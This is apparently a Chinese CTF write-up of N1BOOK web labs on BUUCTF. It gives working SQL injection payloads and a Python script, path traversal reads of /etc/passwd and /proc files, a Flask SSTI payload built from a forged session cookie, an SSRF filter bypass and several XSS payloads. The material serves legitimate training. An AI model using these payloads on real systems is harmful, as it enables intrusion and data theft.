N1BOOK

靶机都在BUUCTF上。

【第一章 web入门】

举足轻重的信息收集

常见的收集

手工只找到了robots.txt,剩下两个是敏感泄露文件。

  • robots.txt
  • index.php~
  • .index.php.swp

粗心的小李

scrabble

CTF中的SQL注入

SQL注入-1

id=3提示加入参数tips=1,输出查询语句:

select * from notes where id ='3'

测试了一下,完全没有WAF,应该是联合查询,尝试联合查询:

id=-1%27union%20select%201,2,3%23&tips=1

注意这里只能用%23,不能用#,否则无法正常值注入,因为在提交的时候,#并没有通过url编码进行转义。

看到回显是23,接下来注入就比较简单了。

-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_SCHEMA)%20from%20information_schema.tables),3%23

查表:

-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_NAME)%20from%20information_schema.tables%20where%20table_schema%3d'note'),3%23

读字段:

-1%27%20union%20select%201,(select%20group_concat(distinct%20COLUMN_NAME)%20from%20information_schema.columns%20where%20table_schema%3d'note'%20and%20table_name%3d'fl4g'),3%23

读字段内容:

-1%27%20union%20select%201,(select%20*%20from%20note.fl4g),3%23

SQL注入-2

脚本:

import requests

url = "http://ef016835-6405-4397-b459-3b902127f1ed.node3.buuoj.cn/login.php?tips=1"

# p = 'SELECT database()'
# p = "SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('note')"
# p = "SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('fl4g')"
p = "SELECT(flag)FROM(note.fl4g)"

admin = "admin' and updatexml(1,concat(0x7e,({}),0x7e),1);#".format(p)

payload = {'name': admin, 'pass': '1'}
files = []
headers = {}

response = requests.request("POST", url, headers=headers, data=payload, files=files)

print(response.text)

后续更新:这部分的正解应该是时间盲注。

任意文件读取漏洞

afr_1

本来以为是关键词过滤,后来才发现是文件有die函数,直接用filter文件流读取。

?p=php://filter/read=convert.base64-encode/resource=flag

afr_2

nginx 文件配置错误,访问/img../穿越目录获得flag。

(一直尝试在/..穿越目录)

afr_3

尝试插入..报错

[Errno 2] No such file or directory: '/home/nu11111111l/articles/article../'

穿越目录

/article?name=../../../etc/passwd

这里用到了Linux下的proc文件系统,即/proc,每个进程以数字命名,其中environ文件存储环境变量。

读文件:

/article?name=../../../proc/1/environ

这里的flag尝试提交失败,猜测应该不是这样做的,但是也没有找到思路,就去看了一下wp,感觉思路完全没对。

wp是查看/proc/self/cmdline:

/proc/$pid/ 可以获取指定进程的信息,但是如果某个进程想获取到自身的信息且不知道$pid时,可以通过访问/proc/self来查看文件,此时等价于/proc/$pid。

/article?name=../../../proc/self/cmdline

得到回显;

python server.py

查看server.py:

/article?name=../../../proc/self/cwd/server.py

可以看见是flask模板,且调用了flag.py以及key.py。

server.py:

import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')

FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag')>=0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e

    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

其中这server.py部分代码存在SSTI cookie 注入。

if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None

读取flag.py时发现提示没有权限,有两种可能:过滤关键词或者是没有权限。测试了一下其他包含flag关键词的字段发现都没有权限,应该是存在关键词过滤(后来发现傻逼了,源码给了)。

key.py:

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

查看 Cookie Session:

Flask Session Cookie Decoder/Encoder 解密

于是使用payload,尝试读取flag.py:

python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40]('/flag.py').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'

报了语法错误的报错,于是尝试转义:

python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40](\'flag.py\').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'
eyJuMWNvZGUiOiJ7e1tdLl9fY2xhc3NfXy5fX21yb19fWzFdLl9fc3ViY2xhc3Nlc19fKClbNDBdKCdmbGFnLnB5JykucmVhZCgpfX0ifQ.X9D_Zw.w_83uqm3Mo7WIsTlt7QFPqtmffA

[第二章 web进阶]

SSRF 漏洞

SSRF Training

<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

正则匹配:

$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);

写一个脚本测试:

<?php
$url = 'http://a:127.0.0.1:80@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);

回显:

Array
(
    [scheme] => http
    [host] => hostname
    [user] => a
    [pass] => 127.0.0.1:80
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)
/path

check检测到的值为[‘host’]:www.baidu.com,而curl抓到的值为127.0.0.1,从而进行绕过。

http://a:@127.0.0.1:80@www.baidu.com/flag.php

XSS的魔力

XSS闯关

payload1:

?username=<script>alert(1);</script>

payload2:

XSS语句已经在script中,直接闭合后alert

?username=xss%27;alert(1);//

payload3:

DOMXSS,插入img

?username=xss<img%20onerror=alert(1)%20src=1>

payload4:

js跳转,使用javascript伪协议

?jumpUrl=javascript:alert()

payload5:

表单自动提交,action可控,提交到伪协议。

?action=javascript:alert()&autosubmit=1

payload6:

angular二次渲染导致XSS:

?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇